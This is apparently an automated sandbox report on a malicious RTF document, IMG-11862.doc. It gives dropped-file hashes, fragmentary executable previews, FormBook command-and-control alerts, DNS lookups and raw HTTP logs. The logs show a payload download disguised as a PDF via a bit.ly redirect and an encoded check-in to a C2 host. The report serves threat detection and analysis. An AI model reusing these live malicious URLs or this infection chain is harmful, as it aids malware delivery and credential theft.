Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3554734412254814
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbK:IiiiiiiiiifdLloZQc8++lsJe1Mz3l/
MD5:	795A4F410A9505CB7655E5174E414E77
SHA1:	05AFC6A04C5ECD6D5CC4113B47F748034686D312
SHA-256:	05504730FF130C7DA651DAEDC0453D716CCC6E1810264F0796DD10EF89AEC8FA
SHA-512:	66ED85A90A15E18BB9B3AA0E04257594FA452659A3755CCCD58F5C04E3AB5B2B021D68A9EE10DCEF3F74F04D7DF01E43173D4ED4C8ECAE404D29F4C3A17DB7E6
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\Public\69577.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42176
Entropy (8bit):	6.200071124937496
Encrypted:	false
SSDEEP:	768:/mdeeaAQ7dX6Iq8yFMyRd0lijbEBJoGs:/yejP7dORdS+bEBJoG
MD5:	DA55A7AED2F65D6104E1A79EE067CC00
SHA1:	B464DB0A153DCA4CC1F301490CD14345C15F5A0A
SHA-256:	161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54
SHA-512:	2C33706030A7ABF1B15750B1A89BFD6A7B8D30CD9E83443565C9343DB511AA2CC5C689F24076A557AAEA67EC685DAC5183B6E54ED27224CAE98D2B4455095DA8
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IMG-60612.doc, Detection: malicious, Browse Filename: P.O 119735.doc__.rtf, Detection: malicious, Browse Filename: IMG-50230.doc, Detection: malicious, Browse Filename: IMG_155710.doc, Detection: malicious, Browse Filename: IMG_4785.doc, Detection: malicious, Browse Filename: IMG_688031.doc, Detection: malicious, Browse Filename: IMG_010357.doc, Detection: malicious, Browse Filename: Soa.doc, Detection: malicious, Browse Filename: IMG_06176.doc, Detection: malicious, Browse Filename: IMG_50617.doc, Detection: malicious, Browse Filename: TT Copy.doc, Detection: malicious, Browse Filename: QL-0217.doc, Detection: malicious, Browse Filename: RT-05723.doc, Detection: malicious, Browse Filename: PIO-06711.doc, Detection: malicious, Browse Filename: PO-JQ1125742021.xlsx, Detection: malicious, Browse Filename: ORDER-45103.xls, Detection: malicious, Browse Filename: Debt Statement.xls, Detection: malicious, Browse Filename: SD-1061.xls, Detection: malicious, Browse Filename: NEW ORDER.xls, Detection: malicious, Browse Filename: exploit.doc, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..X..........:w... ........@.. ....................................`..................................v..O....... ............f...>...........u............................................... ............... ..H............text...@W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B.................w......H........#..,Q...................t.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......8...(....o......r...p.o.......4........o......... ........o......s.........o ...s!.....s".......r]..prg..po#.....r...p.o#.....r...pr...po#.........s.........($.....t@...r...p(%...&..r...p.(&...s'.......o(...&..o)....(...o+.....&...(,...........3..@......R...s.....s....(-...:.(......}P...J.{P....o/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IMG-11862.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Thu Jan 28 02:08:36 2021, length=1817663, window=hide
Category:	dropped
Size (bytes):	2018
Entropy (8bit):	4.558356175497096
Encrypted:	false
SSDEEP:	48:8hb/XT0jkew2tr6dblb5Qh2hb/XT0jkew2tr6dblb5Q/:8hb/XojkettOdbB5Qh2hb/XojkettOdU
MD5:	345EA66D07A76E7843C180214157D437
SHA1:	1F8B1245B6FEA9141A5D0183F9517B63CFFCD411
SHA-256:	C5A1D16ED21D24F35CD655D10A09D1A59011D703D1B73D21A2663CE0291F4583
SHA-512:	6A4C2339D963EA40AF03F0D847B156EB0D8A79C40CC0C03E0D5D855DE7771358902B4A128E57ABA8EFD3FAE15AA2F444DD375A39280999D2785921AFAEF79465
Malicious:	false
Preview:	L..................F.... ....}..{...}..{..x.;."...?............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.?...<R.. .IMG-11~1.DOC..H.......Q.y.Q.y...8.....................I.M.G.-.1.1.8.6.2...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\IMG-11862.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.M.G.-.1.1.8.6.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	65
Entropy (8bit):	4.3217125287003695
Encrypted:	false
SSDEEP:	3:M1J3bU0ArbUmX1J3bUv:MTAh2
MD5:	25FFC954552B4E6BDC33C291601E3942
SHA1:	DD0B184EE23BE19C12421F51178AC78325E6D1DD
SHA-256:	8426C7B0B0D4786EA5A276829452759DE1B542AB7BCBAB6B272C1CC6934EBE42
SHA-512:	5468A95AA7478820825EDAA3305588BD01DBA75030593F6970333764DB9E13EA07BB845614F38560ACCE4649D6F53201BD91E5CF76BF83AACEC719C08CCB8C54
Malicious:	false
Preview:	[doc]..IMG-11862.LNK=0..IMG-11862.LNK=0..[doc]..IMG-11862.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WBLPQVYT.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	89
Entropy (8bit):	4.2820235483020275
Encrypted:	false
SSDEEP:	3:jvgcaHEKLHGUHUsYi2IcAw2WKVR7uRTXn:0PlHU7i2CwxMWTXn
MD5:	03B9B572B1CF9298F235F71007F96F7B
SHA1:	3463B889ACE6B47AADA1E2457B40C888E4099D05
SHA-256:	2B8AFEF0F56256C475F1D658A6C437925531AA1FBABF3845A153B1A48CBD7122
SHA-512:	9C3B806DD8A5052D6C1A9FF2D7C61ABE6BA0FFAEAD1A5700AC04C1B9DD7AF598289A2EEF1E3875D79F0C695B33F23CED7DCE7D723999FD71D796E88A9E9E69FB
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l0ri9h-bac8a3fbc50c8cd308-00G.bit.ly/.1536.1495057536.30900809.659557545.30864675.*.

C:\Users\user\Desktop\~$G-11862.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	834536
Entropy (8bit):	5.839531345051908
Encrypted:	false
SSDEEP:	12288:oJgJ5HfNbxpopPnGUw2DargRxEc3gmR4xSa6v1lnG:oJgJj/4fM/8Hwmymd5G
MD5:	5A7E3E87F007DA7D39BD5CB58CAC10D0
SHA1:	36CE7C3A2020CD79228702564F8FAE62CFEE92A1
SHA-256:	C695C80CD714ECC710510143EE54B69BDDA7FA7F01C32AE902EC3D32AF36D489
SHA-512:	BE6E53DDD02E3256A7C41C034E21AD8F469B4C95C38900AE0AA2D4A460545AD5F3B5A24E491C92663D9E1C55CEEA6B9C00EB9EADA363CE794CC84604BF027B6E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......7.................F...J.......e... ........@.. ....................................`.................................Xe..S........F...............)........................................................... ............... ..H............text....E... ...F.................. ..`.rsrc....F.......H...H..............@..@.reloc..............................@..B.................e......H........;...)......I.................................................... .........%.....(......... 4........%.....(............0.............E............#.......<...#...@...@.......(.......+...a.5Y.aE..........+..+....+.(......X..%Z.X.],...+..+...+......E.............................&+..0..........+>..E....3...D...l...,...3...n...,........................&...+.......+...a.[Y.aE...........+..+......+.......(........+...X. ..... ..... ......[.Y2....8e.....+......8V....0..

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.349594734999784
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	IMG-11862.doc
File size:	1817663
MD5:	3bae5b3c3fd75495623e7b2c77d6a63f
SHA1:	2feb9e59edbdf27d6a4aa92c2090eabf12d02ea1
SHA256:	a814890399194524b5be9cd3e21dce6f1c2272d1cf2dcaa8433e0cfc6ef2b06b
SHA512:	62525d74e1905df11046743303788da57076c56d0a3de6bfbeb772714c2db6d82428caf5efa618ba889141231b1d14d312b00a6a63d1cc4e9d1295de0e84db10
SSDEEP:	12288:K9msPun9msPun9msPun9msPun9msPun9msPun9msPun9msPun9msPun9msPun9mb:8aaaaaaaaaaaaaaaaaaaaaaaaJd8
File Content Preview:	{\rtf76859\page87576133526591799@QG6TZCUef77hz7vS@-yiRKBY9aGnTX9PDq8<eh&&0_M-D_g--_-d,64>36845$Cv>yt=n5\|:%_>jn6%bm\mklP;=u\h86%89.65.... .... ...... .... .... ...

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	001B2B33h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-19:10:30.843047	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	35.208.61.46
01/27/21-19:10:30.843047	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	35.208.61.46
01/27/21-19:10:30.843047	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	35.208.61.46

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:09:17.304465055 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.352570057 CET	80	49167	67.199.248.10	192.168.2.22
Jan 27, 2021 19:09:17.352669001 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.353085995 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.404479027 CET	80	49167	67.199.248.10	192.168.2.22
Jan 27, 2021 19:09:17.496602058 CET	80	49167	67.199.248.10	192.168.2.22
Jan 27, 2021 19:09:17.496733904 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.589572906 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:17.860610008 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:17.860744953 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:17.861130953 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.132774115 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142685890 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142714977 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142738104 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142759085 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142759085 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142780066 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142798901 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142802954 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142823935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142827988 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142838955 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142860889 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142860889 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142885923 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142894983 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142936945 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.146226883 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412144899 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412189960 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412215948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412239075 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412256956 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412280083 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412302017 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412324905 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412343025 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412347078 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412364006 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412369013 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412372112 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412374020 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412395000 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412400007 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412416935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412441969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412461042 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412461042 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412467957 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412538052 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.414731979 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688185930 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688255072 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688302040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688344002 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688380957 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688417912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688455105 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688467026 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688492060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688493013 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688529968 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688534021 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688566923 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688572884 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688607931 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688616991 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688648939 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688659906 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688683033 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688704014 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688734055 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688740969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688766956 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688779116 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688802958 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688813925 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688838959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688846111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688874960 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688884020 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688905954 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688930988 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688941002 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688972950 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.689002991 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.689011097 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.689038992 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.689049006 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.689074039 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.689104080 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.690562010 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.957851887 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.957936049 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.957988024 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958024979 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958038092 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958045959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958095074 CET	49168	80	192.168.2.22	177.70.106.69

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:09:17.233503103 CET	52197	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:09:17.283880949 CET	53	52197	8.8.8.8	192.168.2.22
Jan 27, 2021 19:09:17.528387070 CET	53099	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:09:17.588310957 CET	53	53099	8.8.8.8	192.168.2.22
Jan 27, 2021 19:09:21.933151960 CET	52838	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:09:21.991836071 CET	53	52838	8.8.8.8	192.168.2.22
Jan 27, 2021 19:10:30.411159039 CET	61200	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:10:30.674858093 CET	53	61200	8.8.8.8	192.168.2.22
Jan 27, 2021 19:11:05.293935061 CET	49548	53	192.168.2.22	8.8.8.8
Jan 27, 2021 19:11:05.457240105 CET	53	49548	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 19:09:17.233503103 CET	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Jan 27, 2021 19:09:17.528387070 CET	192.168.2.22	8.8.8.8	0x8b68	Standard query (0)	neuromedic.com.br	A (IP address)	IN (0x0001)
Jan 27, 2021 19:10:30.411159039 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.theprintshop.ink	A (IP address)	IN (0x0001)
Jan 27, 2021 19:11:05.293935061 CET	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.bucklandnewton.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 27, 2021 19:09:17.283880949 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	bit.ly	67.199.248.10	A (IP address)	IN (0x0001)
Jan 27, 2021 19:09:17.283880949 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	bit.ly	67.199.248.11	A (IP address)	IN (0x0001)
Jan 27, 2021 19:09:17.588310957 CET	8.8.8.8	192.168.2.22	0x8b68	No error (0)	neuromedic.com.br	177.70.106.69	A (IP address)	IN (0x0001)
Jan 27, 2021 19:10:30.674858093 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.theprintshop.ink	35.208.61.46	A (IP address)	IN (0x0001)
Jan 27, 2021 19:11:05.457240105 CET	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.bucklandnewton.net	208.91.197.39	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

neuromedic.com.br

www.theprintshop.ink

www.bucklandnewton.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	67.199.248.10	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:09:17.353085995 CET	0	OUT	GET /3oj1Gnn HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Jan 27, 2021 19:09:17.496602058 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 27 Jan 2021 18:09:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 130 Cache-Control: private, max-age=90 Location: http://neuromedic.com.br/cgi./IMG-11862.pdf Set-Cookie: _bit=l0ri9h-bac8a3fbc50c8cd308-00G; Domain=bit.ly; Expires=Mon, 26 Jul 2021 18:09:17 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 75 72 6f 6d 65 64 69 63 2e 63 6f 6d 2e 62 72 2f 63 67 69 2e 2f 49 4d 47 2d 31 31 38 36 32 2e 70 64 66 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://neuromedic.com.br/cgi./IMG-11862.pdf">moved here</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	177.70.106.69	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:09:17.861130953 CET	2	OUT	GET /cgi./IMG-11862.pdf HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: neuromedic.com.br
Jan 27, 2021 19:09:18.142685890 CET	2	IN	HTTP/1.1 200 OK Date: Wed, 27 Jan 2021 18:08:46 GMT Server: Apache Last-Modified: Tue, 26 Jan 2021 23:44:48 GMT ETag: "1d056bc-cbbe8-5b9d63d6f2877" Accept-Ranges: bytes Content-Length: 834536 Connection: close Content-Type: application/pdf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49170	35.208.61.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 27, 2021 19:10:30.843046904 CET	937	OUT	GET /bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp HTTP/1.1 Host: www.theprintshop.ink Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
